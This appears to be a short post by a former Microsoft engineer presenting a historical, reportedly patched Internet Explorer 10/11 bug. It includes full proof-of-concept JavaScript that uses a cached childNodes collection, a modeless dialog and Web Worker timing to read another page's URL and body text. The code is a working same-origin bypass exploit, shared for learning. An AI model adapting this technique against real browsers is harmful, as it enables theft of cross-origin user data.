This is a refreshed version of the earlier childNodes thread bug, updated to work on IE10 and even the early IE11 builds at the time. The structure is the same — cache the childNodes collection, freeze the modeless thread with an alert, use a Web Worker to time the access — but the final access was simplified to read the URL and body text directly.

var thread = new Worker('worker.js');
thread.onmessage = function(event) {
    try {
        _childNodes[0].ownerDocument;
    } catch (e) {
        _childNodes[0].ownerDocument.parentWindow.alert(
            _childNodes[0].ownerDocument.URL + "\n" +
            _childNodes[0].ownerDocument.body.innerText
        );
    }
}

function main() {
    var win = showModelessDialog("redirect.aspx", window, "dialogwidth=400px;dialogHeight=300px");

    var strCode = 'dialogArguments._childNodes = document.childNodes;' +
                  'alert("Please, don\'t close this alert yet");';
    win.setTimeout(strCode);
    thread.postMessage(1);
}

The worker simply waits three seconds then posts back, triggering the main thread to access the cached collection. The first access throws; the second succeeds, displaying the redirected page’s URL and body content. Tested on IE10 / IE11 build 20130227-2100.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.